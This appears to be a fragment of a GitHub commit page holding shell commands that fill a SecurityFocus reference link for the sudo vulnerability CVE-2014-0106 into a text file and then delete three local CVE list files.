sed -in '{/CVE-2014-0106/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/65997\/exploit/g}' cve.sudo2.txt

sed -in '{/CVE-2014-0106/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/65997\/exploit/g}' cve.sudo2.txt


rm cve_list.txt
rm cve_list.html
rm cve_url.txt


Loading

0 comments on commit 1ce7a50

Please sign in to comment.